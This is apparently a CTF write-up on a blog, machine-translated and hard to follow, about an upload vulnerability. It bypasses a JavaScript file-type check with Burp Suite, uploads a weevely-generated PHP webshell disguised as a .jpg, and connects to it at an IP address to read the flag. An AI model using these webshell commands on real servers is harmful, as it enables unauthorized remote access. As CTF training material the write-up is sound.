当前位置:网站首页>Upload vulnerability
Upload vulnerability
2022-07-06 09:52:00 【XRSec】
Upload the loopholes
First , The title is upload, Prompt is upload vulnerability does js Intercept , Code blocking , Look at the following Webpage head head , Find out js Code , keyword jpg
- burpsuite Grab the bag , Configure agent
- weevely Generate a sentence
weevely generate password ./1.php #use weevely Generate... In the current directory 1.php, password passwd mv 1.php 1.php.jpg
- Choose file upload && burpsuite Grab the bag Delete .jpg
- The echo upload success : upload/1592555994.1.php
- weevely Connect
weevely http://220.249.52.133:57535/upload/1592554838.1.php password # weevely Connect dir # Show directory cd ../.. Find out flag.php cat flag.php
obtain flag
边栏推荐
- 一大波开源小抄来袭
- Several ways of MySQL database optimization (pen interview must ask)
- Control the operation of the test module through the panel in canoe (Advanced)
- 竞赛vscode配置指南
- Defensive C language programming in embedded development
- MapReduce working mechanism
- Inject common SQL statement collation
- Tianmu MVC audit I
- Yarn organizational structure
- 小白带你重游Spark生态圈!
猜你喜欢
Nc17 longest palindrome substring
【深度学习】语义分割:论文阅读(NeurIPS 2021)MaskFormer: per-pixel classification is not all you need
在CANoe中通過Panel面板控制Test Module 運行(初級)
手把手教您怎么编写第一个单片机程序
Embedded development is much more difficult than MCU? Talk about SCM and embedded development and design experience
单片机实现模块化编程:思维+实例+系统教程(实用程度令人发指)
Hugo blog graphical writing tool -- QT practice
CAPL script pair High level operation of INI configuration file
Mapreduce实例(九):Reduce端join
Download address of canoe, download and activation of can demo 16, and appendix of all canoe software versions
随机推荐
Tianmu MVC audit II
Programmation défensive en langage C dans le développement intégré
Tianmu MVC audit I
Contrôle de l'exécution du module d'essai par panneau dans Canoe (primaire)
Control the operation of the test module through the panel in canoe (Advanced)
[CV] target detection: derivation of common terms and map evaluation indicators
面试突击62:group by 有哪些注意事项?
Solve the problem of too many small files
How does the single chip microcomputer execute the main function from power on reset?
Mapreduce实例(九):Reduce端join
机械工程师和电气工程师方向哪个前景比较好?
CANoe仿真功能之自动化序列(Automation Sequences )
What are the models of data modeling
Processes of libuv
Workflow - activiti7 environment setup
Take you back to spark ecosystem!
Some thoughts on the study of 51 single chip microcomputer
CANoe CAPL文件操作目录合集
为什么大学单片机课上51+汇编,为什么不直接来STM32
五月刷题02——字符串